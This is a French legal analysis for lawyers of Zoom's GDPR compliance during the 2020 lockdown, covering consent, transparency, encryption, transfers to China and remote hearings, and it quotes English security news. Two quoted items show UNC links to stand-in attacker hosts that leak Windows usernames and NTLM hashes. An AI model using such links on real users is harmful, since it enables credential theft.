Zoom Visio-conférence Pour Les Juristes

Regard Sur Les Nombreuses Considérations Avant L’utilisation D’un Mode De Visio-Conférence.

Analysons les principales conséquences juridiques liées à l’utilisation de l’application de vidéo-conférence gratuite Zoom devenue très populaire qui est passée de 20 à 200 millions d’utilisateurs en l’espace de quelques jours, propulsée par les besoins du confinement et télétravail imposés par la pandémique du Covid-19.

Tout d’abord, de manière schématique, quatre catégories de données sont concernées avec partage plus ou moins volontaire :

• Les données des organisateurs,
• Les données des invités,
• Les données des tiers mentionnés durant la visio-conférence,
• Les données concernant les mineurs.

Parmi elles, deux catégories de données :

• Les données personnelles répondent à la définition relativement large de l’art. 4 [_RGPD04_]

• Les données dites de catégorie spéciale ou données sensibles, qui en principe ne doivent pas être traitées sauf exception. Le traitement de ces données sont strictement encadrés car sujet à une protection accrue telle que définie à l’art. 9 [_RGPD09_]

Les données biométriques et autres données de caractère spéciale traitées à l’occasion de l’utilisation des vidéo-conférences.

Les données traitées par un enregistrement vidéo peuvent-être considérées comme des données ‘biométriques’ lorsque les images peuvent en être détournées pour être utilisables à fin d’identification des personnes.

Selon la Jurisprudence de la Cour Européenne de Justice, C-101/01 (6 novembre 2003) :

• Données personnelles

« L’opération consistant à faire référence, sur une page Internet, à diverses personnes et à les identifier soit par leur nom, soit par d’autres moyens, par exemple leur numéro de téléphone ou des informations relatives à leurs conditions de travail et à leurs passe-temps, constitue un «traitement de données à caractère personnel, automatisé en tout ou en partie,» au sens de l’article 3, paragraphe 1, de la directive 95/46 /CE du Parlement européen et du Conseil, du 24 octobre 1995, relative à la protection des personnes physiques à l’égard du traitement des données à caractère personnel et à la libre circulation de ces données .”

• Les données personnelles de catégories spéciales ou sensitives.

« L’indication du fait qu’une personne s’est blessée au pied et est en congé de maladie partiel constitue une donnée à caractère personnel relative à la santé au sens de l’article 8, paragraphe 1, de la directive 95/46. »

Cet arrêt a été rendu en application de la Directive, antérieure à l’entrée en vigueur du RGDP mais reste applicable. Les données précédemment notamment de santé, répertoriées comme des données ‘sensibles’, sont désormais des données de catégorie spéciale art. 9 [_RGPD09_].

Ce point a été rappelé par une décision récente du Conseil d’Etat en date du 27 Février 2020 concernant la reconnaissance faciale dans les écoles.

Selon le CE : (51) Les données à caractère personnel qui sont, par nature, particulièrement sensibles du point de vue des libertés et des droits fondamentaux méritent une protection spécifique, car le contexte dans lequel elles sont traitées pourrait engendrer des risques importants pour ces libertés et droits. Ces données à caractère personnel devraient comprendre les données à caractère personnel qui révèlent l’origine raciale ou ethnique, étant entendu que l’utilisation de l’expression «origine raciale» dans le présent règlement n’implique pas que l’Union adhère à des théories tendant à établir l’existence de races humaines distinctes. Le traitement des photographies ne devrait pas systématiquement être considéré comme constituant un traitement de catégories particulières de données à caractère personnel, étant donné que celles-ci ne relèvent de la définition de données biométriques que lorsqu’elles sont traitées selon un mode technique spécifique permettant l’identification ou l’authentification unique d’une personne physique. De telles données à caractère personnel ne devraient pas faire l’objet d’un traitement, à moins que celui-ci ne soit autorisé dans des cas spécifiques prévus par le présent règlement, compte tenu du fait que le droit d’un État membre peut prévoir des dispositions spécifiques relatives à la protection des données visant à adapter l’application des règles du présent règlement en vue de respecter une obligation légale ou pour l’exécution d’une mission d’intérêt public ou relevant de l’exercice de l’autorité publique dont est investi le responsable du traitement. Outre les exigences spécifiques applicables à ce traitement, les principes généraux et les autres règles du présent règlement devraient s’appliquer, en particulier en ce qui concerne les conditions de licéité du traitement. Des dérogations à l’interdiction générale de traiter ces catégories particulières de données à caractère personnel devraient être explicitement prévues, entre autres lorsque la personne concernée donne son consentement explicite ou pour répondre à des besoins spécifiques, en particulier lorsque le traitement est effectué dans le cadre d’activités légitimes de certaines associations ou fondations ayant pour objet de permettre l’exercice des libertés fondamentales.

En Grande Bretagne : Murray v Big Picture §80

Il est dès lors permis de considérer que les images traitées à l’occasion d’une visio-conférence rentrent dans le cadre des données biométriques. La possibilité d’éventuels tests de reconnaissance faciale n’est pas inclus. De plus, des utilisateurs ne révélant pas leur identité en utilisant des pseudonymes peuvent être identifiés par la divulgation de leur image.

Par conséquent, les images ou vidéos, identifiant les participants en fonction de leur appartenance raciale, ethnique, religieuse, philosophique ou syndicale sont à considérer comme entrant dans la catégorie des données à caractère spéciale. De même, rentrent dans la catégorie des données spéciales celles ayant trait à l’état de santé ou les données des enfants mineurs.

Voire la recommandation de la CNIL en matière de Reconnaissance faciale et l’arrêt récent du conseil d’Etat du 27 février 2020.

Respect des principes de licéité art. 5 [_RGPD05_]

Les données doivent être collectées doivent répondre aux exigences de licéité énumérées à l’art. 5 [_RGPD05_].

1. Les données à caractère personnel doivent être :

a) traitées de manière licite, loyale et transparente au regard de la personne concernée (licéité, loyauté, transparence);

Un privacy notice doit être produit définissant la base légale de traitement et garantissant les obligations de transparences définies dans l’article 13, comme explicité plus en avant.

b) collectées pour des finalités déterminées, explicites et légitimes, et ne pas être traitées ultérieurement d’une manière incompatible avec ces finalités ; le traitement ultérieur à des fins archivistiques dans l’intérêt public, à des fins de recherche scientifique ou historique ou à des fins statistiques n’est pas considéré, conformément à l’article 89, paragraphe 1, comme incompatible avec les finalités initiales (limitation des finalités);

Tout enregistrement de la vidéo-conférence et ses utilisations ultérieures doivent être notifiés aux participants et ses bases légales justifiées.

c) adéquates, pertinentes et limitées à ce qui est nécessaire au regard des finalités pour lesquelles elles sont traitées (minimisation des données);

Les données collectées doivent être réduites au stricte nécessaire.

d) exactes et, si nécessaire, tenues à jour; toutes les mesures raisonnables doivent être prises pour que les données à caractère personnel qui sont inexactes, eu égard aux finalités pour lesquelles elles sont traitées, soient effacées ou rectifiées sans tarder (exactitude);

Si des données sont conservées, elles seront soumises à l’obligation de mise à jour pour respecter l’exactitude des informations.

e) conservées sous une forme permettant l’identification des personnes concernées pendant une durée n’excédant pas celle nécessaire au regard des finalités pour lesquelles elles sont traitées; les données à caractère personnel peuvent être conservées pour des durées plus longues dans la mesure où elles seront traitées exclusivement à des fins archivistiques dans l’intérêt public, à des fins de recherche scientifique ou historique ou à des fins statistiques conformément à l’article 89, paragraphe 1, pour autant que soient mises en oeuvre les mesures techniques et organisationnelles appropriées requises par le présent règlement afin de garantir les droits et libertés de la personne concernée (limitation de la conservation);

La durée de conservation doit être définie et communiquée aux intervenants. Les enregistrements, s’ils existent, ne peuvent dépasser le délai fixé. Les archivages devant mettre au point des accès limités et sécurisés lorsqu’ils ne sont plus justifiés.

f) traitées de façon à garantir une sécurité appropriée des données à caractère personnel, y compris la protection contre le traitement non autorisé ou illicite et contre la perte, la destruction ou les dégâts d’origine accidentelle, à l’aide de mesures techniques ou organisationnelles appropriées (intégrité et confidentialité);

La sécurité des vidéo-conférences et de leurs enregistrements ou accès ultérieurs sont l’affaire de l’organisateur qui doit s’assurer que le prestataire de service rempli bien sa mission conformément aux obligations du RGDP. Ceci inclus la transmission par voie d’encryptage excluant les transferts vers des pays tiers ne représentant pas une protection adéquate.

2. Le responsable du traitement est responsable du respect du paragraphe 1 et est en mesure de démontrer que celui-ci est respecté (responsabilité).

Ce point est très important car comme exposé infra, la responsabilité de l’organisateur de la vidéo-surveillance peut être engagée pour non-respect du règlement ou accès non autorisé aux données personnelles, ‘distress’ ou perte de contrôle.

La détermination de la finalité du traitement

Tout traitement de données doit répondre à une finalité légitime telle qu’énumérée à l’art. 6 [_RGPD06_] En matière de visio-conférence, le traitement pourra être, soit considéré comme relevant d’un intérêt légitime – avec nécessité de procéder aux tests en trois parties – soit une demande de consentement préalable sera indispensable. Le motif de traitement devra être consigné par le contrôleur le cas échéant sur son registre des traitements art. 30 [_RGPD30_] et mentionné dans le privacy notice. Il faut rappeler qu’en matière de consentement, celui-ci peut être retranché à tout moment avec le risque d’invalider la licéité de tout enregistrement conservé.

Sur le consentement

Le paragraphe 11) de l’art. 4 [_RGPD04_] définit le consentement comme « toute manifestation de volonté, libre, spécifique, éclairé et univoque par laquelle la personne concernée accepte, par une déclaration ou par un acte positif clair, que des données à caractère personnel la concernant fassent l’objet d’un traitement ».

En outre, l’art. 7 [_RGPD07_], relatif aux conditions applicables au consentement, dispose :

« 1. Dans les cas où le traitement repose sur le consentement, le responsable du traitement est en mesure de démontrer que la personne concernée a donné son consentement au traitement de données à caractère personnel la concernant.  

2. Si le consentement de la personne concernée est donné dans le cadre d’une déclaration écrite qui concerne également d’autres questions, la demande de consentement est présentée sous une forme qui la distingue clairement de ces autres questions, sous une forme compréhensible et aisément accessible, et formulée en des termes clairs et simples. Aucune partie de cette déclaration qui constitue une violation du présent règlement n’est contraignante. / (…) Au moment de déterminer si le consentement est donné librement, il y a lieu de tenir le plus grand compte de la question de savoir, entre autres, si l’exécution d’un contrat, y compris la fourniture d’un service, est subordonnée au consentement au traitement de données à caractère personnel qui n’est pas nécessaire à l’exécution dudit contrat. ».

• Un consentement explicite, et informé, est requis des participants à la vidéo-conférence lorsque les données sont collectées avec précision de l’enregistrement ou toutes diffusions totale ou partielle ultérieures, y compris copies d’écrans (screenshots) des meetings. Rappelons que, s’agissant de données biométriques capables d’identifier des individus, données de catégorie spéciale art. 9-2 a) – ceci concerne les données des participants et de toutes autres données personnelles traitées lors de la visio-conférence art. 9 [_RGPD09_] – les consentements devront être répertoriés au registre des traitement conformément à l’art. 30 [_RGPD30_]. La finalité de traitement des données des personnes non présentes devra être justifiée distinctement.

• Certains participants peuvent souhaiter utiliser des pseudonymes pour une raison qui leur appartient et peuvent ne pas souhaiter être exposé au grand public. Une alternative doit leur être proposée.

Obligation de transparence – art. 13 [_RGPD13_]

Ainsi que mentionné plus avant, l’organisateur de la visio-conférence ou le ‘host’ se doit de communiquer en toute transparence les règles et cadre de traitement des données, avant la collecte et fournir, au préalable, aux participants :

En réalité, il semblerait que de nombreuses applications de visio-conférences manquent cruellement de transparence. L’hôte dispose de multiples capacités et prérogatives techniques qui sont la plupart du temps inconnues aux autres participants telles que l’enregistrement et leurs diffusions ultérieures. L’art. 13 [_RGPD13_] requiert de fournir à la personne concernée l’ensemble de ces informations :

• l’identité et les coordonnées du responsable du traitement et, le cas échéant, du représentant du responsable du traitement;
• les coordonnées du délégué à la protection des données, le cas échéant;
• les finalités du traitement auquel les données personnelles sont destinées ainsi que la base juridique du traitement;
• lorsque le traitement est basé sur l’art. 6, paragraphe 1, point f [_RGPD06_] les intérêts légitimes poursuivis par le responsable du traitement ou par un tiers;
• les destinataires ou catégories de destinataires des données personnelles, le cas échéant;
• le cas échéant, le fait que le responsable du traitement a l’intention de transférer des données à caractère personnel vers un pays tiers ou une organisation internationale et l’existence ou l’absence d’une décision d’adéquation de la Commission, ou dans le cas de transferts visés aux art. 46 [_RGPD46_] ou 47 [_RGPD47_] ou 49 [_RGPD49_] paragraphe 1, deuxième alinéa, référence aux garanties appropriées ou appropriées et aux moyens permettant d’en obtenir une copie ou lorsque celles-ci ont été mises à disposition.
• Les droits des participants en vertu des art. 14 [_RGPD14_] , art 15 [_RGPD15_] et notamment leur droit de rectification ou rétractation du consentement, leur droit de porter plainte devant l’autorité administrative doivent également leur être rappelés

En sus des informations visées au paragraphe 1, le responsable du traitement fournit, au moment de l’obtention des données à caractère personnel, aux participants, les informations supplémentaires suivantes nécessaires pour garantir un traitement équitable et transparent :

• la période pendant laquelle les données personnelles seront stockées ou, si cela n’est pas possible, les critères utilisés pour déterminer cette période;
  • l’existence du droit de demander au responsable du traitement l’accès et la rectification ou l’effacement des données personnelles ou la limitation du traitement concernant la personne concernée ou de s’opposer au traitement ainsi que le droit à la portabilité des données;
  • lorsque le traitement est basé sur l’art. 6 [_RGPD06_] paragraphe 1, point a), ou sur l’art. 9 [_RGPD09_] paragraphe 2, point a), l’existence du droit de retirer le consentement à tout moment, sans affecter la licéité du traitement basé sur le consentement avant son retrait;
  • le droit de déposer une plainte auprès d’une autorité de contrôle;
  • si la fourniture de données à caractère personnel est une exigence légale ou contractuelle, ou une exigence nécessaire pour conclure un contrat, ainsi que si la personne concernée est tenue de fournir les données à caractère personnel et les conséquences possibles de la non-fourniture de ces données;
  • l’existence d’une prise de décision automatisée, y compris le profilage, visée à l’art. 22 [_RGPD22_] paragraphes 1 et 4, et, au moins dans ces cas, des informations significatives sur la logique impliquée, ainsi que la signification et les conséquences envisagées d’une telle le traitement de la personne concernée.

Lorsque le responsable du traitement a l’intention de poursuivre le traitement des données à caractère personnel à une fin autre que celle pour laquelle ces données ont été collectées, le responsable du traitement fournit à la personne concernée, avant ce traitement ultérieur, des informations sur cette autre fin et toute autre information pertinente visée au paragraphe 2.

Les paragraphes 1, 2 et 3 ne s’appliquent pas lorsque et dans la mesure où la personne concernée dispose déjà des informations.

Un avis de confidentialité doit être remis au moment de la collecte des données, c’est-à-dire avant l’heure à laquelle les invités entrent en réunion.

Les périodes de conservation des données doivent être clarifiées et communiquées.

L’exigence de limitation de la finalité signifie qu’il doit être clair sur l’avis de confidentialité qui accède aux données, dans quel but spécifique. Le partage de données avec Facebook était contraire au RGPD. Même si le développeur Zoom a modifié cela, les utilisateurs doivent mettre à jour leur application.

Ces données ne doivent pas être utilisées à d’autres fins que celles prévus telles que la formation à la reconnaissance faciale sans le consentement des intéressés. Le host est responsable du respect de ces principes et notamment des traitements ultérieurs par Zoom.

Le privacy policy de Zoom a soulevé des craintes justifiées :

• Zoom’s privacy policy  claims the right to collect and store personal data and share it with third parties such as advertisers.

Jusqu’à ce qu’il soit modifié durant le week-end, pré-daté au 18 mars

• The company updated its privacy policy on Sunday after users reported concerns, and on Monday, Eric S. Yuan, chief executive and founder of Zoom, posted a link on Twitter to a company blog item about the policy. NYTimes
• In a statement for this article, the company said it took “its users’ privacy, security and trust extremely seriously,” and had been “working around the clock to ensure that hospitals, universities, schools and other businesses across the world can stay connected and operational.”
• “We appreciate the New York attorney general’s engagement on these issues and are happy to provide her with the requested information,” the statement added.
• Zoom privacy notice grants access to data even though for people who have not a Zoom account
• Zoom’s privacy policy gives the company rights to collect personal data of people regardless of whether they have a Zoom account. This data they might collect on non-Zoom customers might include their physical address, debit card information and even what device they are using.
• They keep the right to collect and share information with unspecified third parties in present and in the future.

Privacy by design ou Privacy Enhanced Technology (PET)

L’application Zoom comporte bien quelques garde-fous de protection mais ils sont désactivés par défaut. Aucun traitement ne doit pouvoir être opéré sans transparence ni consentement exprimé par acte positif des sujets concernés. En l’occurrence il n’est pas très clair quand un enregistrement est effectué ni ses utilisations ultérieures.

L’application comportait une option de traçage d’attention ou ’attention tracking’ qui permettait au host de tracer l’attention des participants s’ils venaient à visiter d’autres sites ou basculaient sur d’autres fenêtres. Cette option trop intrusive a été désactivée.

Encore une fois, une notice de privacy devrait éclairer le consentement requis de la part des participants. Il n’est pas activé par défaut sachant que les données biométriques, de santé ou relatives à des mineurs sont des catégories spéciales nécessitant un consentement explicite.

• A small red button when recording – can be easily missed. There is an option of request recording consent at the beginning – what about the ones joining in in the course of the meeting? The consent request is OFF by default. Privacy by design: should be ON by default

Obligation de sécurité

Limiter l’accès aux données pour sécuriser le contenu et primordial.

Absence de chiffrage ou encryptage

Le chiffrage des communications ou encryptage faisait partie des promesses de Zoom mais s’est avéré limité un chiffrage de type browser TLS et non pas UDP comme l’a révélé le Intercept. Zoom s’en est excusé et a reconnu le manquement. Or, un encryptage end to end est obligatoire pour s’assurer de la protection des données d’autant qu’ils peuvent être de catégorie spéciale.

Or, il s’avère que les données seraient stockées sur Amazon S3 en texte clair et ne seraient pas même chiffrées. Par conséquent, tout employé ou développeur de Zoom ayant accès aux compartiments S3 pour les activités de développement et de maintenance pourrait les intercepter et se les accaparer pour tels traitements éventuels. Il n’y a donc aucune véritable confidentialité sur ces enregistrements. Ce problème est loin d’être négligeable.

La seule barrière entre l’enregistrement privé et public est la sécurité du pare-feu Zoom et des autres éléments qu’ils ont mis en place. Une fois que ceux-ci ont été violés, par exemple par une attaque de phishing, les seaux S3 sont un jeu équitable. Un système de cryptage décent sur les enregistrements stockés aurait été indispensable ici.

• a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”
• On 4/3, Citizen Lab reported
• Zoom documentation claims that the app uses “AES-256” encryption for meetings where possible. However, we find that in each Zoom meeting, a single AES-128 key is used in ECB mode by all participants to encrypt and decrypt audio and video. The use of ECB mode is not recommended because patterns present in the plaintext are preserved during encryption.
• The AES-128 keys, which we verified are sufficient to decrypt Zoom packets intercepted in Internet traffic, appear to be generated by Zoom servers, and in some cases, are delivered to participants in a Zoom meeting through servers in China, even when all meeting participants, and the Zoom subscriber’s company, are outside of China. Reported by the Security expert Schneier in his blog
• Does Zoom uses end to end encryption?
• Warning: Zoom Makes Encryption Keys In China (Sometimes)
• Where is the EU DPA investigation? Once again, Eu personal data is in between China interception and the US Cloud Act interception. Data sent outside the EU in China without users knowledge. “As Citizen Lab hadn’t sent its findings to Zoom, saying it was in the public interest to release the information as soon as possible, the videoconferencing company wouldn’t have been aware of the findings. But Yuan assured that if user data was being transferred to China when users weren’t even based there, “we are willing to address that.”

On apprend ainsi même que Zoom transfèrerait des données pour encryptage en Chine, ce que le CEO n’a pas manqué de reconnaitre, accidentellement a-t-il dit.

• Zoom’s Encryption Is “Not Suited For Secrets” And Has Surprising Links To China, Researchers Discover

Les déboires ne s’arrêtent pas là, 1er Avril une nouvelle est tombée, Zoom s’emparerait des passwords sauvegardés par Windows:

• On 4/1, we learned that Zoom for Windows can be used to steal users’ Window credentials.
• Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings — such as \\attacker.example.com/C$ — into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.

Le 2 avril on apprenait que Zoom accèderait à des données personnelles extraites des profiles Linkedin des utilisateurs :

• On 4/2, we learned that Zoom secretly displayed data from people’s LinkedIn profiles, which allowed some meeting participants to snoop on each other. (Zoom has fixed this one.)
• Every Zoom Security and Privacy Flaw So Far, and What You Can Do to Protect Yourself

Très vite ont surgi les nouvelles d’intrus s’invitant au milieu des meetings, intrusion qualifiée de ‘ZoomBombing’ :

• Naked man crashing school’s video call is a privacy lesson for all
• Online Zoom classes were disrupted by individuals spewing racist, misogynistic or vulgar content. Experts say professors using Zoom should familiarize themselves with the program’s settings.
• Suddenly, dozens of attendees were bombarded with disturbing imagery. A troll entered the call and screenshared Two Girls, One Cup and other horrifying sexual videos. Attempts to block the attack were thwarted as the perpetrator simply re-entered the call

Autre problème éventuellement solutionné par Zoom, l’envoi de données à Facebook par utilisation de SDK dénoncé par Motherboard :

• Last week, after an article on the news site Motherboard reported that software inside the Zoom iPhone app was sending user data to Facebook, the company said it was removing the tracking software.
• Zoom, like other apps, uses Facebook’s software development kits (SDK) to implement features quickly. In exchange, Facebook gains useful information about users. As Vice’s Motherboard explains, Zoom connects to Facebook’s Graph API, which is the way developers get data in or out of Facebook.
• The Zoom app notifies Facebook when the user opens the app, details on the user’s device such as the model, the time zone and city they are connecting from, which phone carrier they are using, and a unique advertiser identifier created by the user’s device which companies can use to target a user with advertisements.

Zoom a bien modifié cette faille invitant les utilisateurs de mettre à jour leur Application :

• Zoom Removes Its Facebook Data Sharing on iOS amid Possible GDPR Violations
• Zoom has removed its Facebook SDK for iOS integration after a report from Motherboard.
• the developers in a statement. “Users will need to update to the latest version of our application that’s already available at 2:30 p.m. Pacific time on Friday, March 27, 2020, in order for these changes to take hold, and we strongly encourage them to do so. “

Le Electronic Frountier Foundation alerte de ce que les utilisateurs ignorent toujours comment effacer les informations recueillies

• Zoom has not offered guidance on how users can delete any information that was gathered about their device. This removal also doesn’t address any of the app’s other potential privacy issues. The EFF points out that Zoom administrators can get detailed information about how, when, and where users are using the app, with real-time dashboards. As it’s an intentional feature, it’s unlikely the companywill address this.

On lit dans le magazine Forbes :

• ‘Ultimately, anyone having sensitive conversations should therefore consider whether Zoom is suitable, he noted. “I would think very carefully before I used Zoom to communicate classified information, trade secrets or confidential medical data,” Marczak said. “If you are a human rights defender, lawyer, journalist, or anyone else working on sensitive topics that you think a nation-state or other powerful adversary might be interested in, I would advise you to wait for Zoom to make security improvements in their app before you use it.”

Apple a introduit une mise à jour afin d’éliminer le ‘hidden Zoom web server’ :

• Thousands of Zoom video calls left exposed on open Web
• Apple has pushed a silent Mac update to remove hidden Zoom web server
• It appears you can snaffle people’s Windows local login usernames and hashed passwords via Zoom by getting them to click on a URL in a chat message that connects to a malicious SMB file server. A link such as \\evil.server.com\foorbar.jpg will, when clicked on, cause Windows to connect to evil.server.com, supplying the logged-in user’s credentials in hope of fetching foobar.jpg.
• Ex-NSA hacker drops new zero-day doom for Zoom. Hot on the heels of two security researchers finding a Zoom bug that can be abused to steal Windows passwords, another security researcher found two new bugs that can be used to take over a Zoom user’s Mac, including tapping into the webcam and microphone.
• Patrick Wardle, a former NSA hacker and now principle security researcher at Jamf, dropped the two previously undisclosed flaws on his blog Wednesday, which he shared with TechCrunch.

Bien évidemment avec le succès galopant de Zoom, on constate une recrue de ‘fake Zooms’

• Researchers see sharp rise in fake Zoom domains as hackers target remote workers https://siliconangle.com/2020/03/30/researchers-see-sharp-rise-fake-zoom-domains-hackers-target-remote-workers/

Transfert de données personnelles hors EU/EEA

Zoom est une société basée en Californie. A ce titre il est self certifié Privacy Shield.

Cependant Intercept a révélé le transfert des données vers la Chine. Le CEO a reconnu ce fait l’attribuant à une simple erreur d’aiguillage.

Or, nul ne peut ignorer la guerre de l’espionnage industriel. Zoom, comme toute société américaine est sujette au US Cloud Act. Autrement dit à tout moment les données peuvent être réclamées par le gouvernement US.

• As Usage Booms Amid Coronavirus Crisis, Zoom’s R&D Presence In China Under Scrutiny

Data breach ou accès non autorisé aux données

Tout accès non autorisé aux données personnelles doit être évalué quant au sérieux des conséquences potentielles pour les individus concernés. En cas de risque grave, ils doivent être notifiés au plus vite et pas plus tard que dans les 72 heures. L’autorité de protection des données doit être notifié au plus tard dans les 72 heures. Dans tous les cas le data breach doit être repertorié au registre interne conformément aux dispositions de l’art. 33 [_RGPD33_].

• Posting screen shots de visio-conférence révélant le ID number du meeting et les images des participants accompagnées de leur noms ou pseudonymes peut être considérées comme une rupture de confidentialité,
• 2 exemples majeurs récents : Boris Johnson le CNB postant une réunion du conseil ou leur AG.

Le cas particulier de l’usage d’un tel outil par des avocats ou ordre professionnel

Dans un contexte ou tant de cris d’alarmes ont été lancés à propos des manquements de cet outil, comme le New York Attorney General investigations demandant aux écoles de ne pas utiliser l’application, suivi par d’autres autorités étatiques.

• NY Attorney General to look at Zoom  :
• Multiple state AGs looking into Zoom’s privacy practices

Utilisation de vidéo-conférences pour des tenues d’audience :

Le 3 avril, Maitre Aymeric Duhesne du Cabinet Montesquieu a annoncée sur Linkedin :

« Avec Le Bâtonnier Stephane Dhonte, le greffe du Tribunal de Commerce de Lille Métropole et le juge des référés, nous venons de finaliser le test de la 1ère audience en visioconférence comme le permet l’ordonnance 2020-304 du 25.03.20. Le Barreau de Lille et ses avocats sont force de proposition et de solution immédiatement opérationnelle et marquent ainsi leur détermination à permettre la continuité de l’accès au droit aux justiciables, particuliers et entreprises, malgré la crise sanitaire. Des dossiers pourront à nouveau être entendus dès la semaine prochaine et des décisions rendues.”

Parallèlement, Stephen Almaseanu, Vice procureur au Parquet de Paris, Section F2 (adjoint du chef de la section, chargé des affaires commerciales) announcait sur Linkedin:

“Le Tribunal de commerce de Paris vient de tenir, mercredi 1et et jeudi 2 avril 2020, deux journées d’audiences dématérialisées qui se sont très bien déroulées. Plus de 40 dossiers urgents, notamment en raison de la présence de salariés impayés, ont été traités par visioconférence en utilisant TIXEO, logiciel français assurant une totale confidentialité des débats grâce à des liaisons entièrement chiffrées, ce qui lui permet d’être certifié par l’ANSSI – Agence nationale de la sécurité des systèmes d’information. Il s’agissait d’ouvertures de liquidations et de conversions en liquidation, mais également d’ouvertures de redressements judiciaires (rappelons d’ailleurs ici que depuis le début du confinement de nombreux mandats ad hoc et conciliations ont également été ouverts). Bravo notamment au greffe du Tribunal, qui a organisé ces audiences très lourdes à mettre en place en prévenant tous les intervenants (dirigeants, conseils, AJMJ, représentants des salariés) de l’heure exacte du passage de leur dossier pour que chacun puisse se connecter au bon moment). Bravo également aux juges et à tous les intervenants qui ont permis la tenue de ces premières audiences très utiles, qui permettent aux entreprises parisiennes de continuer à avoir accès au tribunal en cas d’urgence.”

Maitre Emmanuel Brunau du Mans annonçait hier toujours sur Linkedin :

“Pour information, le greffe du tribunal de commerce du Mans fonctionne normalement malgré la fermeture de la Cité judiciaire. Une permanence téléphonique est maintenue aux horaires habituels. Enfin pour faire face à l’urgence, des audiences d’ouverture de procédures collectives en visioconférence sécurisée TIXEO se tiennent tous les mardi pendant le confinement.”

Là où les initiatives tombent au compte-gouttes en France, du côté anglo-saxon une initiative concertée a émergé :

Launched today: REMOTE COURTS WORLDWIDE, designed to help the global community of justice workers share experiences of ‘remote’ alternatives (audio, video, online) to traditional courts. This is a joint effort involving SCL – Society for Computers and Law , HM Courts & Tribunals Service (HMCTS), and the UK’s LawTech Delivery Panel. We must seize the moment and come together to accelerate the development of new ways of continuing to deliver just outcomes for court users. Please contribute content at

Nonobstant la popularité de cet outil de visio-conférence, les cris d’alarmes continuent à se faire entendre contre l’utilisation de Zoom.

EPIC, Electronic Privacy Information Center, demande investigations au FTC

• “Jonathan Leitschuh, exposed a flaw allowing hackers to take over Zoom webcams. The letter noted that the company did not address problem until after the Electronic Privacy Information Center, a public interest research center, filed a complaint about Zoom with the Federal Trade Commission last year.”
• “According to EPIC, Zoom intentionally designed its web conferencing service to bypass browser security settings and remotely enable a user’s web camera without the knowledge or consent of the user. As a result, Zoom exposed users to the risk of remote surveillance, unwanted videocalls, and denial-of-service attacks,” the complaint alleged.”
• “EPIC Urges FTC to Investigate Zoom, Issue Best Practices for Online Conferencing In a letter to FTC Chairman Joe Simons, EPIC urged the FTC to “open an investigation of Zoom’s business practices and to issue, as soon as practicable, Best Practices for Online Conferencing Services.” Here’s the press release “

Le FBI lance des alertes

• “Earlier this week, the FBI warned of so-called “Zoom-bombing” or videoconference hacking. “The FBI has received multiple reports of conferences being disrupted by pornographic and/or hate images and threatening language,” it said.” Published by CNN

–        Zoom needs to clean up its privacy act

“Privacy advocacy group Access Now, meanwhile, dug into Zoom’s privacy policy and practices and didn’t like what it saw, sending a letter to the company on March 19 asking it to publish a transparency report along the same lines as other companies that made it plain exactly what the company was doing with its users’ data. “ Harvard Blog

• “Attorney General Tong Issues Recommendations for Safe Video Conferencing. “Earlier this week, I attended a Zoom conference that was ‘bombed’ by hundreds of profane and racist comments. Needless to say, I am familiarizing myself with these platforms’ privacy and security features, too. My office has been in contact with representatives from Zoom to address this and other issues relating to online security and privacy,” said Attorney General Tong. “ In the meantime, Attorney General Tong encouraged everyone to practice safer video conferencing by: • Ensuring that your video conference software is up to date. • Confirming that your conferences are private, either by requiring a password for entry or controlling guest access through a virtual waiting room. • Checking that the highest security settings are applied for your teleconference platform. • Consult your software company’s security information or your IT department. Here’s the press release ”

Quel peut-être la responsabilité des juristes en matière de traitement des données consécutifs à l’utilisation d’une application qui a soulevé tant de tôlés

Un avocat est tenu par le secret professionnel qu’il se doit de garantir. La loi du 31 décembre 1971, et plus particulièrement les dispositions de son article 66-5 impliquent qu’« en toutes matières, que ce soit dans le domaine du conseil ou dans celui de la défense, les consultations adressées par un avocat à son client ou destinées à celui-ci, les correspondances échangées entre le client et son avocat, entre l’avocat et ses confrères à l’exception pour ces dernières de celles portant la mention « officielle », les notes d’entretien et, plus généralement, toutes les pièces du dossier sont couvertes par le secret professionnel »

Nécessité d’une étude d’impact à réaliser avant l’adoption de la nouvelle technologie,

Afin de s’assurer du bon respect des règles de protection des données telles que sus-développées, les avocats sur les pas de leurs ordres professionnels, doivent s’assurer de la conformité des moyens techniques utilisés. La confidentialité des informations dont ils sont mis en charge leur impose la plus grande vigilance.

Dans ce contexte, une évaluation de l’impact de la nouvelle technologie sur la protection des données traitées s’impose avant tout usage.

La CNIL explique :

L’AIPD est un outil important pour la responsabilisation des organismes : elle les aide non seulement à construire des traitements de données respectueux de la vie privée, mais aussi à démontrer leur conformité au Règlement général sur la protection des données (RGPD). Elle est obligatoire pour les traitements susceptibles d’engendrer des risques élevés.

• L’AIPD se décompose en trois parties :

Une description détaillée du traitement mis en œuvre, comprenant tant les aspects techniques qu’opérationnelsL’évaluation, de nature plus juridique, de la nécessité et de la proportionnalité concernant les principes et droits fondamentaux  (finalité, données et durées de conservation, information et droits des personnes, etc.) non négociables, qui sont fixés par la loi et doivent être respectés, quels que soient les risques ;

L’étude, de nature plus technique, des risques sur la sécurité des données (confidentialité, intégrité et disponibilité) ainsi que  leurs impacts potentiels sur la vie privée, qui permet de déterminer les mesures techniques et organisationnelles nécessaires pour protéger les données.

On note qu’analyse d’impact relative à la protection des données, AIPD (Data Protection Impact Assessment, terme retenu dans le RGPD) et PIA (Privacy Impact Assessment, terme plus commun utilisé dans d’autres régions du monde) sont synonymes.

• Une Analyse d’Impact est obligatoire lorsque, toujours selon la CNIL :

…le traitement est « susceptible d’engendrer un risque élevé pour les droits et libertés des personnes concernées ».

Soit le traitement envisagé figure dans la liste des types d’opérations de traitement pour lesquelles la CNIL a estimé obligatoire de réaliser une analyse d’impact relative à la protection des données.

Soit le traitement remplit au moins deux des neuf critères issus des lignes directrices du G29 :

Soit le traitement remplit au moins deux des neuf critères issus des lignes directrices du G29 :

évaluation/scoring (y compris le profilage) ;

décision automatique avec effet légal ou similaire ;

surveillance systématique ;

collecte de données sensibles ou données à caractère hautement personnel ;

collecte de données personnelles à large échelle ;

